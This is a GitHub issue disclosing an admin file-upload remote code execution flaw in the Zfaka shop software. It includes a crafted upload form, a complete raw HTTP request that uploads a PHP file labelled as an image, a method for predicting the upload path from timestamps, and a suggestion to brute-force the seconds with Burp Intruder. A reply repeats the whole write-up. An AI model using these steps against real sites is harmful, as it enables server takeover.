Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Zfaka Backend RCE(All version) #260

Open
J0o1ey opened this issue Jan 31, 2022 · 2 comments
Open

Zfaka Backend RCE(All version) #260

J0o1ey opened this issue Jan 31, 2022 · 2 comments

Comments

@J0o1ey
Copy link

J0o1ey commented Jan 31, 2022

in the background file upload, Zfaka only has one JS check in \public\res\layui\lay\modules\upload.js

there is no filtering for the file extension, and there is only one front-end JS verification, So disabling JS can directly implement the background rce

image-20210526205833957

The controller of upload in the background is located in \application\modules\Admin\controllers\Products.php

The upload path will not be returned after the file is uploaded, but we already know the upload path and the naming rules of the uploaded file

image-20210526204139761

UPLOAD_ Path is defined as follows

define('UPLOAD_PATH', APP_PATH.'/public/res/upload/');

CUR_ Date is defined as follows

define('CUR_DATE', date('Y-m-d'));

file name

$filename=date("His"); // Hour + minute + second

Taking 21:05 as an example, the output results are as follows

image-20210526210650296

Take 21:05:44 on May 26, 2021 as an example

The full file path is

http://www.xxx.com/res/upload/2021-05-26/210444.php

Construct form directly

<meta charset="utf-8">

<form action=" http://xxx.top/Admin/products/imgurlajax " method="post" enctype="multipart/form-data">

<label for="file">File:</label>

<input type="file" name="file" id="file" />

<input type="text" name="pid" id="pid" /> <--! Remember to modify the PID to the ID of the commodity (you can get it by selecting the commodity packet capture in the background) - > < / -! >

<input type="submit" value="Upload" />

</form>

At the same time, you need to add referers: http://xxx.top/Admin/products/imgurl/?id=1 , and modify the

Otherwise, "please select product ID" will be prompted

Finally, the complete upload HTTP request is as follows

POST http://xxx.top/Admin/products/imgurlajax HTTP/1.1

Host: xxxx

Content-Length: 291

Accept: application/json, text/javascript, */*; q=0.01

DNT: 1

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeSrhtSPGxub0H0eb

Origin: http://47.105.132.207

Referer: http://xxx.top/Admin/products/imgurl/?id=12

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh; q=0.9,en; q=0.8

Cookie: PHPSESSID=ql4ep5uk8cf9i0rvihrruuilaq

Connection: close



------WebKitFormBoundaryeSrhtSPGxub0H0eb

Content-Disposition: form-data; name="file"; filename="test.php"

Content-Type: image/png



<? php

phpinfo();

------WebKitFormBoundaryeSrhtSPGxub0H0eb

Content-Disposition: form-data; name="pid"



12

------WebKitFormBoundaryeSrhtSPGxub0H0eb--

Direct upload succeeded

Then run the last seconds with burpsuite intruder

After all, the number of seconds can't be so accurate

image-20210526212753095

image-20210526233749316

@GXLiLuoQin
Copy link

Use PHP7.2+

@danel8
Copy link

danel8 commented Feb 24, 2022

thanks you are so nice

in the background file upload, Zfaka only has one JS check in \public\res\layui\lay\modules\upload.js

there is no filtering for the file extension, and there is only one front-end JS verification, So disabling JS can directly implement the background rce

image-20210526205833957

The controller of upload in the background is located in \application\modules\Admin\controllers\Products.php

The upload path will not be returned after the file is uploaded, but we already know the upload path and the naming rules of the uploaded file

image-20210526204139761

UPLOAD_ Path is defined as follows

define('UPLOAD_PATH', APP_PATH.'/public/res/upload/');

CUR_ Date is defined as follows

define('CUR_DATE', date('Y-m-d'));

file name

$filename=date("His"); // Hour + minute + second

Taking 21:05 as an example, the output results are as follows

image-20210526210650296

Take 21:05:44 on May 26, 2021 as an example

The full file path is

http://www.xxx.com/res/upload/2021-05-26/210444.php

Construct form directly

<meta charset="utf-8">

<form action=" http://xxx.top/Admin/products/imgurlajax " method="post" enctype="multipart/form-data">

<label for="file">File:</label>

<input type="file" name="file" id="file" />

<input type="text" name="pid" id="pid" /> <--! Remember to modify the PID to the ID of the commodity (you can get it by selecting the commodity packet capture in the background) - > < / -! >

<input type="submit" value="Upload" />

</form>

At the same time, you need to add referers: http://xxx.top/Admin/products/imgurl/?id=1 , and modify the

Otherwise, "please select product ID" will be prompted

Finally, the complete upload HTTP request is as follows

POST http://xxx.top/Admin/products/imgurlajax HTTP/1.1

Host: xxxx

Content-Length: 291

Accept: application/json, text/javascript, */*; q=0.01

DNT: 1

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeSrhtSPGxub0H0eb

Origin: http://47.105.132.207

Referer: http://xxx.top/Admin/products/imgurl/?id=12

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh; q=0.9,en; q=0.8

Cookie: PHPSESSID=ql4ep5uk8cf9i0rvihrruuilaq

Connection: close



------WebKitFormBoundaryeSrhtSPGxub0H0eb

Content-Disposition: form-data; name="file"; filename="test.php"

Content-Type: image/png



<? php

phpinfo();

------WebKitFormBoundaryeSrhtSPGxub0H0eb

Content-Disposition: form-data; name="pid"



12

------WebKitFormBoundaryeSrhtSPGxub0H0eb--

Direct upload succeeded

Then run the last seconds with burpsuite intruder

After all, the number of seconds can't be so accurate

image-20210526212753095

image-20210526233749316

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants